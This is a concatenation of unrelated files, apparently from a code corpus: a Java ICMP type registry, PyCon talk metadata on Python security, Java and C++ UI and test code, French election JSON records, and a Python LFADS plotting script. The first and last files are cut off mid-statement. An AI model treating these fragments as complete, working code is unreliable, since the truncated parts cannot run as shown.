= new IcmpV4Type((byte) 32, "Mobile Host Redirect"); /** IPv6 Where-Are-You: 33 */ public static final IcmpV4Type IPV6_WHERE_ARE_YOU = new IcmpV4Type((byte) 33, "IPv6 Where-Are-You"); /** IPv6 I-Am-Here: 34 */ public static final IcmpV4Type IPV6_I_AM_HERE = new IcmpV4Type((byte) 34, "IPv6 I-Am-Here"); /** Mobile Registration Request: 35 */ public static final IcmpV4Type MOBILE_REGISTRATION_REQUEST = new IcmpV4Type((byte) 35, "Mobile Registration Request"); /** Mobile Registration Reply: 36 */ public static final IcmpV4Type MOBILE_REGISTRATION_REPLY = new IcmpV4Type((byte) 
36, "Mobile Registration Reply"); /** Domain Name Request: 37 */ public static final IcmpV4Type DOMAIN_NAME_REQUEST = new IcmpV4Type((byte) 37, "Domain Name Request"); /** Domain Name Reply: 38 */ public static final IcmpV4Type DOMAIN_NAME_REPLY = new IcmpV4Type((byte) 38, "Domain Name Reply"); /** SKIP: 39 */ public static final IcmpV4Type SKIP = new IcmpV4Type((byte) 39, "SKIP"); /** Photuris: 40 */ public static final IcmpV4Type PHOTURIS = new IcmpV4Type((byte) 40, "Photuris"); private static final Map<Byte, IcmpV4Type> registry = new HashMap<Byte, IcmpV4Type>(); static { registry.put(ECHO_REPLY.value(), ECHO_REPLY); registry.put(DESTINATION_UNREACHABLE.value(), DESTINATION_UNREACHABLE); registry.put(SOURCE_QUENCH.value(), SOURCE_QUENCH); registry.put(REDIRECT.value(), REDIRECT); registry.put(ALTERNATE_HOST_ADDRESS.value(), ALTERNATE_HOST_ADDRESS); registry.put(ECHO.value(), ECHO); registry.put(ROUTER_ADVERTISEMENT.value(), ROUTER_ADVERTISEMENT); registry.put(ROUTER_SOLICITATION.value(), ROUTER_SOLICITATION); registry.put(TIME_EXCEEDED.value(), TIME_EXCEEDED); registry.put(PARAMETER_PROBLEM.value(), PARAMETER_PROBLEM); registry.put(TIMESTAMP.value(), TIMESTAMP); registry.put(TIMESTAMP_REPLY.value(), TIMESTAMP_REPLY); registry.put(INFORMATION_REQUEST.value(), INFORMATION_REQUEST); registry.put(INFORMATION_REPLY.value(), INFORMATION_REPLY); registry.put(ADDRESS_MASK_REQUEST.value(), ADDRESS_MASK_REQUEST); registry.put(ADDRESS_MASK_REPLY.value(), ADDRESS_MASK_REPLY); registry.put(TRACEROUTE.value(), TRACEROUTE); registry.put(DATAGRAM_CONVERSION_ERROR.value(), DATAGRAM_CONVERSION_ERROR); registry.put(MOBILE_HOST_REDIRECT.value(), MOBILE_HOST_REDIRECT); registry.put(IPV6_WHERE_ARE_YOU.value(), IPV6_WHERE_ARE_YOU); registry.put(IPV6_I_AM_HERE.value(), IPV6_I_AM_HERE); registry.put(MOBILE_REGISTRATION_REQUEST.value(), MOBILE_REGISTRATION_REQUEST); registry.put(MOBILE_REGISTRATION_REPLY.value(), MOBILE_REGISTRATION_REPLY); registry.put(DOMAIN_NAME_REQUEST.value(), DOMAIN_NAME_REQUEST); registry.put(DOMAIN_NAME_REPLY.value(), DOMAIN_NAME_REPLY); registry.put(SKIP.value(), SKIP); registry.put(PHOTURIS.value(), PHOTURIS); } /** * @param value value * @param name name */ public IcmpV4Type(Byte value, String name) { super(value, name); } /** * @param value value * @return a IcmpV4Type object. */ public static IcmpV4Type getInstance(Byte value) { if (registry.containsKey(value)) { return registry.get(value); } else { return new IcmpV4Type(value, "unknown"); } } /** * @param type type * @return a IcmpV4Type object. */ public static IcmpV4Type register(IcmpV4Type type) { return registry.put(type.value(), type); } @Override public String valueAsString() { return String.valueOf(value() & 0xFF); } @Override public int compareTo(IcmpV4Type o) { return value().compareTo(o.value()); } }
2,538
435
{ "copyright_text": null, "description": "Python is a language that in a easy way allows to scale up from starter projects to complex applications for data processing and serving dynamic web pages. But as you increase complexity in your applications, it can be easy to introduce potential problems and vulnerabilities. In this talk, I will highlight the biggest problems we can find in python functions, how to use then in a secure way and tools and services that help you identify vulnerabilities in the python source code. These could be the main talking points: -Introduction to secure programming in python. -Introduce dangerous functions for code inyection and how we can solve this issues from a security point of view. -Common attack vectors on Python applications like Remote Command Execution and SQL injection -Best practices for avoid execution of malicious commands -Tools that help us to protect and obfuscate our source code", "duration": 2425, "language": "eng", "recorded": "2018-11-10", "related_urls": [ { "label": "Conference schedule", "url": "http://schedule.pycon18.python.ie/" } ], "speakers": [ "<NAME>" ], "tags": [ "security" ], "thumbnail_url": "https://i.ytimg.com/vi/myqZiiKyiRg/maxresdefault.jpg", "title": "Testing python security", "videos": [ { "type": "youtube", "url": "https://www.youtube.com/watch?v=myqZiiKyiRg" } ] }
412
785
<reponame>eddie4941/servicetalk<gh_stars>100-1000 /* * Copyright © 2020-2021 Apple Inc. and the ServiceTalk project authors * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package io.servicetalk.concurrent.test.internal; import io.servicetalk.concurrent.Cancellable; import io.servicetalk.concurrent.PublisherSource; import org.junit.jupiter.api.Test; import java.util.concurrent.ThreadLocalRandom; import javax.annotation.Nullable; import static io.servicetalk.concurrent.internal.DeliberateException.DELIBERATE_EXCEPTION; import static java.util.concurrent.TimeUnit.MILLISECONDS; import static org.hamcrest.MatcherAssert.assertThat; import static org.hamcrest.Matchers.is; import static org.hamcrest.Matchers.notNullValue; import static org.hamcrest.Matchers.nullValue; import static org.junit.jupiter.api.Assertions.assertSame; import static org.mockito.Mockito.mock; class TestSingleSubscriberTest { @Test void onSubscribe() { TestSingleSubscriber<Integer> subscriber = new TestSingleSubscriber<>(); doOnSubscribe(subscriber); assertThat(subscriber.pollTerminal(200, MILLISECONDS), is(nullValue())); } @Test void onSubscribeOnComplete() { onSubscribeOnTerminal(true); } @Test void onSubscribeOnError() { onSubscribeOnTerminal(false); } private static void onSubscribeOnTerminal(boolean onComplete) { TestSingleSubscriber<Integer> subscriber = new TestSingleSubscriber<>(); doOnSubscribe(subscriber); assertThat(subscriber.pollTerminal(200, MILLISECONDS), is(nullValue())); doTerminalSignal(subscriber, onComplete); } @Test void singleItem() { singleItem(ThreadLocalRandom.current().nextInt()); } @Test void singleItemNull() { singleItem(null); } @Test void singleItemCancelBefore() { TestSingleSubscriber<Integer> subscriber = new TestSingleSubscriber<>(); doOnSubscribe(subscriber).cancel(); subscriber.onSuccess(10); assertThat(subscriber.awaitOnSuccess(), is(10)); } @Test void singleItemCancelAfter() { TestSingleSubscriber<Integer> subscriber = new TestSingleSubscriber<>(); Cancellable c = doOnSubscribe(subscriber); subscriber.onSuccess(10); c.cancel(); assertThat(subscriber.awaitOnSuccess(), is(10)); } private static void singleItem(@Nullable Integer i) { TestSingleSubscriber<Integer> subscriber = new TestSingleSubscriber<>(); doOnSubscribe(subscriber); subscriber.onSuccess(i); assertThat(subscriber.awaitOnSuccess(), is(i)); } private static Cancellable doOnSubscribe(TestSingleSubscriber<Integer> subscriber) { PublisherSource.Subscription subscription = mock(PublisherSource.Subscription.class); subscriber.onSubscribe(subscription); Cancellable realCancellable = subscriber.awaitSubscription(); assertThat(realCancellable, notNullValue()); return realCancellable; } private static void doTerminalSignal(TestSingleSubscriber<Integer> subscriber, boolean onComplete) { if (onComplete) { Integer value = ThreadLocalRandom.current().nextInt(); subscriber.onSuccess(value); assertThat(subscriber.awaitOnSuccess(), is(value)); } else { subscriber.onError(DELIBERATE_EXCEPTION); assertSame(DELIBERATE_EXCEPTION, subscriber.awaitOnError()); } } 
}
1,464
679
<gh_stars>100-1000 /************************************************************** * * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. * *************************************************************/ #ifndef _STGIO_HXX #define _STGIO_HXX #include <stgcache.hxx> #include <stgelem.hxx> #include <tools/string.hxx> class StgFATStrm; class StgDataStrm; class StgDirStrm; class String; enum FAT_ERROR { FAT_OK, FAT_WRONGLENGTH, FAT_UNREFCHAIN, FAT_OVERWRITE, FAT_OUTOFBOUNDS, FAT_INMEMORYERROR, FAT_ONFILEERROR, FAT_BOTHERROR }; struct StgLinkArg { String aFile; sal_uLong nErr; }; class StgIo : public StgCache { void SetupStreams(); // load all internal streams sal_Bool bCopied; public: StgIo(); ~StgIo(); StgHeader aHdr; // storage file header StgFATStrm* pFAT; // FAT stream StgDirStrm* pTOC; // TOC stream StgDataStrm* pDataFAT; // small data FAT stream StgDataStrm* pDataStrm; // small data stream short GetDataPageSize(); // get the logical data page size sal_Bool Load(); // load a storage file sal_Bool Init(); // set up an empty file sal_Bool CommitAll(); // commit everything (root commit) static void SetErrorLink( const Link& ); static const Link& GetErrorLink(); sal_uLong ValidateFATs( ); }; #endif
708
348
{"nom":"Chaumercenne","circ":"1ère circonscription","dpt":"Haute-Saône","inscrits":140,"abs":58,"votants":82,"blancs":0,"nuls":9,"exp":73,"res":[{"nuance":"REM","nom":"Mme <NAME>","voix":40},{"nuance":"FN","nom":"Mme <NAME>","voix":33}]}
96
524
<reponame>Qt-Widgets/im-desktop-imported<filename>gui/voip/VideoPanel.cpp<gh_stars>100-1000 #include "stdafx.h" #include "VideoPanel.h" #include "DetachedVideoWnd.h" #include "VoipTools.h" #include "MaskPanel.h" #include "../core_dispatcher.h" #include "../main_window/MainPage.h" #include "../main_window/MainWindow.h" #include "../main_window/contact_list/ContactListModel.h" #include "../utils/utils.h" #include "../utils/gui_metrics.h" #include "SelectionContactsForConference.h" #include "../main_window/contact_list/ContactList.h" #include "../main_window/contact_list/ChatMembersModel.h" #include "../controls/ContextMenu.h" #define internal_spacer_w (Utils::scale_value(16)) #define internal_spacer_w4 (Utils::scale_value(16)) #define internal_spacer_w_small (Utils::scale_value(12)) #define DISPLAY_ADD_CHAT_BUTTON 0 enum { kFitSpacerWidth = 560, kNormalModeMinWidth = 560}; Ui::VideoPanel::VideoPanel( QWidget* _parent, QWidget* _container) #ifdef __APPLE__ : BaseBottomVideoPanel(_parent, Qt::Window | Qt::FramelessWindowHint | Qt::WindowDoesNotAcceptFocus | Qt::NoDropShadowWindowHint) #elif defined(__linux__) : BaseBottomVideoPanel(_parent, Qt::Widget) #else : BaseBottomVideoPanel(_parent) #endif , mouseUnderPanel_(false) , container_(_container) , parent_(_parent) , rootWidget_(nullptr) , addChatButton_(nullptr) , fullScreenButton_(nullptr) , stopCallButton_(nullptr) , videoButton_(nullptr) , isTakling(false) , isFadedVisible(false) , localVideoEnabled_(false) , isScreenSharingEnabled_(false) , isCameraEnabled_(true) { #ifndef __linux__ setStyleSheet(Utils::LoadStyle(qsl(":/qss/video_panel"))); setProperty("VideoPanelMain", true); setAttribute(Qt::WA_NoSystemBackground, true); setAttribute(Qt::WA_TranslucentBackground, true); #else setStyleSheet(Utils::LoadStyle(qsl(":/qss/video_panel_linux"))); setProperty("VideoPanelMain", true); #endif rootWidget_ = new QWidget(this); rootWidget_->setContentsMargins(0, 0, 0, 0); rootWidget_->setProperty("VideoPanel", true); QVBoxLayout* mainLayout = Utils::emptyVLayout(); setLayout(mainLayout); QHBoxLayout* layoutTarget = Utils::emptyHLayout(); layoutTarget->setAlignment(Qt::AlignTop); mainLayout->addWidget(rootWidget_); rootWidget_->setLayout(layoutTarget); QWidget* parentWidget = rootWidget_; auto addButton = [this, layoutTarget](QPushButton* btn, const char* _propertyName, const char* _slot, QHBoxLayout* layout = nullptr) { if (_propertyName != NULL) { btn->setProperty(_propertyName, true); } btn->setSizePolicy(QSizePolicy(QSizePolicy::Preferred, QSizePolicy::Expanding)); btn->setCursor(QCursor(Qt::PointingHandCursor)); btn->setFlat(true); (layout ? 
layout : layoutTarget)->addWidget(btn); #ifdef __APPLE__ connect(btn, &QPushButton::clicked, this, &VideoPanel::activateWindow, Qt::QueuedConnection); #endif connect(btn, SIGNAL(clicked()), this, _slot, Qt::QueuedConnection); }; auto addAndCreateButton = [parentWidget, addButton] (const char* _propertyName, const char* _slot, QHBoxLayout* layout = nullptr)->QPushButton* { QPushButton* btn = new voipTools::BoundBox<QPushButton>(parentWidget); addButton(btn, _propertyName, _slot, layout); return btn; }; layoutTarget->addSpacing(internal_spacer_w_small); /** * We have this layout: * | Left Layout | Center Controls | Right Layout| */ QHBoxLayout* leftLayout = Utils::emptyHLayout(); QHBoxLayout* rightLayout = Utils::emptyHLayout(); goToChat_ = addAndCreateButton("CallGoChat", SLOT(onClickGoChat()), leftLayout); goToChat_->setToolTip(QT_TRANSLATE_NOOP("tooltips", "Open chat page")); leftLayout->addStretch(1); layoutTarget->addLayout(leftLayout, 1); openMasks_ = new MaskWidget(nullptr); addButton(openMasks_, "OpenMasks", SIGNAL(onShowMaskPanel())); openMasks_->setMaskEngineReady(true); layoutTarget->addSpacing(internal_spacer_w); microfone_ = addAndCreateButton("CallEnableMic", SLOT(onCaptureAudioOnOffClicked())); layoutTarget->addSpacing(internal_spacer_w); stopCallButton_ = addAndCreateButton("StopCallButton", SLOT(onHangUpButtonClicked())); stopCallButton_->setToolTip(QT_TRANSLATE_NOOP("tooltips", "End call")); stopCallButton_->setProperty("BigButton", true); layoutTarget->addSpacing(internal_spacer_w); shareScreenButton_ = addAndCreateButton("ShareScreenButtonDisable", SLOT(onShareScreen())); shareScreenButton_->setProperty("BigButton", true); #ifdef __linux__ shareScreenButton_->hide(); #else layoutTarget->addSpacing(internal_spacer_w); #endif videoButton_ = addAndCreateButton(NULL, SLOT(onVideoOnOffClicked())); videoButton_->setProperty("BigButton", true); //layoutTarget->addSpacing(internal_spacer_w); //rightSpacer_ = new QSpacerItem(1, 1, QSizePolicy::MinimumExpanding); //layoutTarget->addSpacerItem(rightSpacer_); rightLayout->addStretch(1); rightLayout->addSpacing(internal_spacer_w); fullScreenButton_ = addAndCreateButton("CallFSOff", SLOT(_onFullscreenClicked()), rightLayout); layoutTarget->addLayout(rightLayout, 1); layoutTarget->addSpacing(internal_spacer_w_small); resetHangupText(); QObject::connect(&Ui::GetDispatcher()->getVoipController(), SIGNAL(onVoipMediaLocalVideo(bool)), this, SLOT(onVoipMediaLocalVideo(bool)), Qt::DirectConnection); //QObject::connect(&Ui::GetDispatcher()->getVoipController(), SIGNAL(onVoipCallNameChanged(const voip_manager::ContactsList&)), this, SLOT(onVoipCallNameChanged(const voip_manager::ContactsList&)), Qt::DirectConnection); //QObject::connect(&Ui::GetDispatcher()->getVoipController(), SIGNAL(onVoipMinimalBandwidthChanged(bool)), this, SLOT(onVoipMinimalBandwidthChanged(bool)), Qt::DirectConnection); QObject::connect(&Ui::GetDispatcher()->getVoipController(), SIGNAL(onVoipVideoDeviceSelected(const voip_proxy::device_desc&)), this, SLOT(onVoipVideoDeviceSelected(const voip_proxy::device_desc&)), Qt::DirectConnection); QObject::connect(&Ui::GetDispatcher()->getVoipController(), SIGNAL(onVoipMediaLocalAudio(bool)), this, SLOT(onVoipMediaLocalAudio(bool)), Qt::DirectConnection); //rootEffect_ = std::make_unique<UIEffects>(*rootWidget_, false, true); } Ui::VideoPanel::~VideoPanel() { } void Ui::VideoPanel::keyReleaseEvent(QKeyEvent* _e) { QWidget::keyReleaseEvent(_e); if (_e->key() == Qt::Key_Escape) { emit onkeyEscPressed(); } } void 
Ui::VideoPanel::controlActivated(bool _activated) { mouseUnderPanel_ = _activated; if (_activated) { emit onMouseEnter(); } else { emit onMouseLeave(); } } void Ui::VideoPanel::onClickGoChat() { if (!activeContact_.empty()) { Ui::GetDispatcher()->getVoipController().openChat(QString::fromStdString(activeContact_[0].contact)); emit onGoToChatButton(); } } void Ui::VideoPanel::setContacts(const std::vector<voip_manager::Contact>& contacts) { activeContact_ = contacts; // Update button visibility. goToChat_->setVisible(contacts.size() == 1); } //void Ui::VideoPanel::onClickAddChat() //{ // assert(false); //} void Ui::VideoPanel::setFullscreenMode(bool _en) { if (!fullScreenButton_) { return; } fullScreenButton_->setProperty("CallFSOff", _en); fullScreenButton_->setProperty("CallFSOn", !_en); fullScreenButton_->setToolTip(_en ? QT_TRANSLATE_NOOP("tooltips", "Exit full screen") : QT_TRANSLATE_NOOP("tooltips", "Full screen")); fullScreenButton_->setStyle(QApplication::style()); } void Ui::VideoPanel::_onFullscreenClicked() { emit onFullscreenClicked(); } void Ui::VideoPanel::enterEvent(QEvent* _e) { QWidget::enterEvent(_e); if (!mouseUnderPanel_) { emit onMouseEnter(); } } void Ui::VideoPanel::leaveEvent(QEvent* _e) { QWidget::leaveEvent(_e); mouseUnderPanel_ = false; emit onMouseLeave(); } void Ui::VideoPanel::resizeEvent(QResizeEvent* _e) { QWidget::resizeEvent(_e); #ifdef __APPLE__ // Forced set fixed size, because under mac we use cocoa to change panel size. setFixedSize(size()); #endif #ifdef __APPLE__ assert(parent_); if (parent_ && !parent_->isFullScreen()) { auto rc = rect(); QPainterPath path(QPointF(0, 0)); path.addRoundedRect(rc.x(), rc.y(), rc.width(), rc.height(), Utils::scale_value(5), Utils::scale_value(5)); QRegion region(path.toFillPolygon().toPolygon()); region = region + QRect(0, 0, rc.width(), Utils::scale_value(5)); setMask(region); } else { clearMask(); } #endif } void Ui::VideoPanel::resetHangupText() { if (stopCallButton_) { stopCallButton_->setText(QString()); stopCallButton_->repaint(); } } void Ui::VideoPanel::onHangUpButtonClicked() { Ui::GetDispatcher()->getVoipController().setHangup(); } void Ui::VideoPanel::onShareScreen() { const QList<voip_proxy::device_desc>& screens = Ui::GetDispatcher()->getVoipController().screenList(); int screenIndex = 0; if (!isScreenSharingEnabled_ && screens.size() > 1) { ContextMenu menu(this); ContextMenu::applyStyle(&menu, false, Utils::scale_value(15), Utils::scale_value(36)); for (int i = 0; i < screens.size(); i++) { menu.addAction(QT_TRANSLATE_NOOP("voip_pages", "Screen") % ql1c(' ') % QString::number(i + 1), [i, this, screens]() { isScreenSharingEnabled_ = !isScreenSharingEnabled_; Ui::GetDispatcher()->getVoipController().switchShareScreen(!screens.empty() ? &screens[i] : nullptr); updateVideoDeviceButtonsState(); }); } menu.exec(QCursor::pos()); } else { isScreenSharingEnabled_ = !isScreenSharingEnabled_; Ui::GetDispatcher()->getVoipController().switchShareScreen(!screens.empty() ? 
&screens[screenIndex] : nullptr); updateVideoDeviceButtonsState(); } if (isScreenSharingEnabled_) { emit onShareScreenClickOn(); } } void Ui::VideoPanel::onVoipMediaLocalVideo(bool _enabled) { if (!videoButton_) { return; } localVideoEnabled_ = _enabled; updateVideoDeviceButtonsState(); statistic::getGuiMetrics().eventVideocallStartCapturing(); } void Ui::VideoPanel::changeEvent(QEvent* _e) { QWidget::changeEvent(_e); if (_e->type() == QEvent::ActivationChange) { if (isActiveWindow() || (rootWidget_ && rootWidget_->isActiveWindow())) { if (container_) { container_->raise(); raise(); } } } } void Ui::VideoPanel::onVideoOnOffClicked() { if (!(isCameraEnabled_ && localVideoEnabled_)) { emit onCameraClickOn(); } Ui::GetDispatcher()->getVoipController().setSwitchVCaptureMute(); } void Ui::VideoPanel::fadeIn(unsigned int _kAnimationDefDuration) { if (!isFadedVisible) { isFadedVisible = true; #ifndef __linux__ BaseVideoPanel::fadeIn(_kAnimationDefDuration); //rootEffect_->geometryTo(QRect(0, 0, width(), height()), _kAnimationDefDuration); #endif } } void Ui::VideoPanel::fadeOut(unsigned int _kAnimationDefDuration) { if (isFadedVisible) { isFadedVisible = false; #ifndef __linux__ BaseVideoPanel::fadeOut(_kAnimationDefDuration); //rootEffect_->geometryTo(QRect(0, height(), width(), 1), _kAnimationDefDuration); #endif } } void Ui::VideoPanel::forceFinishFade() { BaseVideoPanel::forceFinishFade(); //if (rootEffect_) //{ // rootEffect_->forceFinish(); // rootWidget_->update(); // rootWidget_->setFixedWidth(width()); // rootWidget_->setFixedWidth(QWIDGETSIZE_MAX); //} } bool Ui::VideoPanel::isFadedIn() { return isFadedVisible; } bool Ui::VideoPanel::isActiveWindow() { return QWidget::isActiveWindow(); } bool Ui::VideoPanel::isNormalPanelMode() { auto rc = rect(); return (rc.width() >= Utils::scale_value(kNormalModeMinWidth)); } bool Ui::VideoPanel::isFitSpacersPanelMode() { auto rc = rect(); return (rc.width() < Utils::scale_value(kFitSpacerWidth)); } void Ui::VideoPanel::activateVideoWindow() { parentWidget()->activateWindow(); parentWidget()->raise(); } int Ui::VideoPanel::heightOfCommonPanel() { return rootWidget_->height(); } void Ui::VideoPanel::onVoipVideoDeviceSelected(const voip_proxy::device_desc& desc) { isScreenSharingEnabled_ = (desc.dev_type == voip_proxy::kvoipDevTypeVideoCapture && desc.video_dev_type == voip_proxy::kvoipDeviceDesktop); isCameraEnabled_ = (desc.dev_type == voip_proxy::kvoipDevTypeVideoCapture && desc.video_dev_type == voip_proxy::kvoipDeviceCamera); updateVideoDeviceButtonsState(); } void Ui::VideoPanel::updateVideoDeviceButtonsState() { bool enableCameraButton = localVideoEnabled_ && isCameraEnabled_; bool enableScreenButton = localVideoEnabled_ && isScreenSharingEnabled_; videoButton_->setProperty("CallEnableCam", enableCameraButton); videoButton_->setProperty("CallDisableCam", !enableCameraButton); videoButton_->setToolTip(enableCameraButton ? QT_TRANSLATE_NOOP("tooltips", "Turn off camera") : QT_TRANSLATE_NOOP("tooltips", "Turn on camera")); shareScreenButton_->setProperty("ShareScreenButtonDisable", !enableScreenButton); shareScreenButton_->setProperty("ShareScreenButtonEnable", enableScreenButton); shareScreenButton_->setToolTip(enableScreenButton ? 
QT_TRANSLATE_NOOP("tooltips", "Turn off screen sharing") : QT_TRANSLATE_NOOP("tooltips", "Turn on screen sharing")); videoButton_->setStyle(QApplication::style()); shareScreenButton_->setStyle(QApplication::style()); } void Ui::VideoPanel::onCaptureAudioOnOffClicked() { Ui::GetDispatcher()->getVoipController().setSwitchACaptureMute(); emit onMicrophoneClick(); } void Ui::VideoPanel::onVoipMediaLocalAudio(bool _enabled) { if (microfone_) { microfone_->setProperty("CallEnableMic", _enabled); microfone_->setProperty("CallDisableMic", !_enabled); microfone_->setToolTip(_enabled ? QT_TRANSLATE_NOOP("tooltips", "Turn off microphone") : QT_TRANSLATE_NOOP("tooltips", "Turn on microphone")); microfone_->setStyle(QApplication::style()); } } void Ui::VideoPanel::setSelectedMask(MaskWidget* maskWidget) { if (maskWidget) { openMasks_->setPixmap(maskWidget->pixmap()); } }
5,738
14,668
// Copyright 2020 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. package org.chromium.weblayer.test; import static org.junit.Assert.assertFalse; import static org.junit.Assert.assertTrue; import static org.chromium.content_public.browser.test.util.TestThreadUtils.runOnUiThreadBlocking; import android.content.Context; import android.content.SharedPreferences; import android.content.pm.PackageInfo; import android.content.pm.PackageManager; import androidx.test.filters.SmallTest; import org.junit.After; import org.junit.Before; import org.junit.Rule; import org.junit.Test; import org.junit.runner.RunWith; import org.chromium.base.ContextUtils; import org.chromium.base.PathUtils; import org.chromium.weblayer.shell.InstrumentationActivity; import java.io.File; import java.io.IOException; /** * Tests that WebLayer version changes handle data correctly. */ @RunWith(WebLayerJUnit4ClassRunner.class) public class DowngradeTest { public static final String PREF_LAST_VERSION_CODE = "org.chromium.weblayer.last_version_code_used"; @Rule public InstrumentationActivityTestRule mActivityTestRule = new InstrumentationActivityTestRule(); // A test file in the app's data directory. This should never get deleted. private File mAppFile; // A test file in WebLayer's data directory. This should get deleted when we downgrade. private File mWebLayerDataFile; @Before public void setUp() throws IOException, PackageManager.NameNotFoundException { PathUtils.setPrivateDataDirectorySuffix("weblayer", "weblayer"); mWebLayerDataFile = new File(PathUtils.getDataDirectory(), "testWebLayerFile"); assertTrue(mWebLayerDataFile.createNewFile()); Context context = ContextUtils.getApplicationContext(); PackageManager packageManager = context.getPackageManager(); PackageInfo packageInfo = packageManager.getPackageInfo(context.getPackageName(), 0); mAppFile = new File(packageInfo.applicationInfo.dataDir, "testAppFile"); assertTrue(mAppFile.createNewFile()); } @After public void tearDown() { mAppFile.delete(); mWebLayerDataFile.delete(); } @Test @SmallTest public void testDowngradeDeletesData() throws IOException { SharedPreferences prefs = ContextUtils.getAppSharedPreferences(); prefs.edit().putInt(PREF_LAST_VERSION_CODE, 9999_000_00).apply(); InstrumentationActivity activity = mActivityTestRule.launchWithProfile("profile"); runOnUiThreadBlocking( () -> { activity.loadWebLayerSync(ContextUtils.getApplicationContext()); }); assertFalse(mWebLayerDataFile.exists()); assertTrue(mAppFile.exists()); } @Test @SmallTest public void testUnknownLastVersionKeepsData() throws IOException { SharedPreferences prefs = ContextUtils.getAppSharedPreferences(); assertFalse(prefs.contains(PREF_LAST_VERSION_CODE)); InstrumentationActivity activity = mActivityTestRule.launchWithProfile("profile"); runOnUiThreadBlocking( () -> { activity.loadWebLayerSync(ContextUtils.getApplicationContext()); }); assertTrue(mWebLayerDataFile.exists()); assertTrue(mAppFile.exists()); } @Test @SmallTest public void testNewVersionKeepsData() { SharedPreferences prefs = ContextUtils.getAppSharedPreferences(); prefs.edit().putInt(PREF_LAST_VERSION_CODE, 1_000_00).apply(); InstrumentationActivity activity = mActivityTestRule.launchWithProfile("profile"); runOnUiThreadBlocking( () -> { activity.loadWebLayerSync(ContextUtils.getApplicationContext()); }); assertTrue(mWebLayerDataFile.exists()); assertTrue(mAppFile.exists()); } }
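DowngradeTest pins down the observable contract: on load, WebLayer compares the version code stored under org.chromium.weblayer.last_version_code_used with the current one, wipes its own data directory on a downgrade, and leaves data alone when the preference is absent or the version moved forward. The sketch below is not the WebLayer implementation, only a hedged reconstruction of that contract in plain Android Java; the DowngradeCheck class and its helper are invented, and the real code may differ.

```java
import android.content.SharedPreferences;
import java.io.File;

// Illustrative only: reconstructs the contract exercised by DowngradeTest above.
final class DowngradeCheck {
    private static final String PREF_LAST_VERSION_CODE =
            "org.chromium.weblayer.last_version_code_used";

    /** Deletes the implementation's data directory if the stored version is newer than the current one. */
    static void maybeWipeOnDowngrade(SharedPreferences prefs, File dataDir, int currentVersionCode) {
        int lastVersion = prefs.getInt(PREF_LAST_VERSION_CODE, -1);
        // An absent preference yields -1, which can never exceed a real version code,
        // so first runs and upgrades keep the data -- matching the test's expectations.
        if (lastVersion > currentVersionCode) {
            deleteRecursively(dataDir);
        }
        prefs.edit().putInt(PREF_LAST_VERSION_CODE, currentVersionCode).apply();
    }

    private static void deleteRecursively(File file) {
        File[] children = file.listFiles();
        if (children != null) {
            for (File child : children) {
                deleteRecursively(child);
            }
        }
        file.delete();
    }
}
```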
1,374
4,772
package example.repo; import example.model.Customer1668; import java.util.List; import org.springframework.data.repository.CrudRepository; public interface Customer1668Repository extends CrudRepository<Customer1668, Long> { List<Customer1668> findByLastName(String lastName); }
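Customer1668Repository only declares a derived query, findByLastName; Spring Data generates the implementation from the method name at runtime. A minimal usage sketch follows; it calls nothing beyond what the interface above declares, while the Customer1668Lookup service class is invented for illustration and the derived-query comment is an approximation.

```java
import example.model.Customer1668;
import example.repo.Customer1668Repository;
import java.util.List;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;

// Illustrative service; only the repository interface shown above is used.
@Service
public class Customer1668Lookup {

    private final Customer1668Repository repository;

    @Autowired
    public Customer1668Lookup(Customer1668Repository repository) {
        this.repository = repository;
    }

    /** Returns how many stored customers carry the given last name. */
    public int countByLastName(String lastName) {
        // Spring Data derives the query from the method name "findByLastName",
        // roughly: select c from Customer1668 c where c.lastName = ?1
        List<Customer1668> matches = repository.findByLastName(lastName);
        return matches.size();
    }
}
```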
87
348
{"nom":"Saint-Léon","circ":"12ème circonscription","dpt":"Gironde","inscrits":268,"abs":148,"votants":120,"blancs":13,"nuls":4,"exp":103,"res":[{"nuance":"REM","nom":"Mme <NAME>","voix":52},{"nuance":"FI","nom":"M. <NAME>","voix":51}]}
95
82,518
<filename>research/lfads/plot_lfads.py # Copyright 2017 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # ============================================================================== from __future__ import absolute_import from __future__ import division from __future__ import print_function import matplotlib matplotlib.use('Agg') from matplotlib import pyplot as plt import numpy as np import tensorflow as tf def _plot_item(W, name, full_name, nspaces): plt.figure() if W.shape == (): print(name, ": ", W) elif W.shape[0] == 1: plt.stem(W.T) plt.title(full_name) elif W.shape[1] == 1: plt.stem(W) plt.title(full_name) else: plt.imshow(np.abs(W), interpolation='nearest', cmap='jet'); plt.colorbar() plt.title(full_name) def all_plot(d, full_name="", exclude="", nspaces=0): """Recursively plot all the LFADS model parameters in the nested dictionary.""" for k, v in d.iteritems(): this_name = full_name+"/"+k if isinstance(v, dict): all_plot(v, full_name=this_name, exclude=exclude, nspaces=nspaces+4) else: if exclude == "" or exclude not in this_name: _plot_item(v, name=k, full_name=full_name+"/"+k, nspaces=nspaces+4) def plot_time_series(vals_bxtxn, bidx=None, n_to_plot=np.inf, scale=1.0, color='r', title=None): if bidx is None: vals_txn = np.mean(vals_bxtxn, axis=0) else: vals_txn = vals_bxtxn[bidx,:,:] T, N = 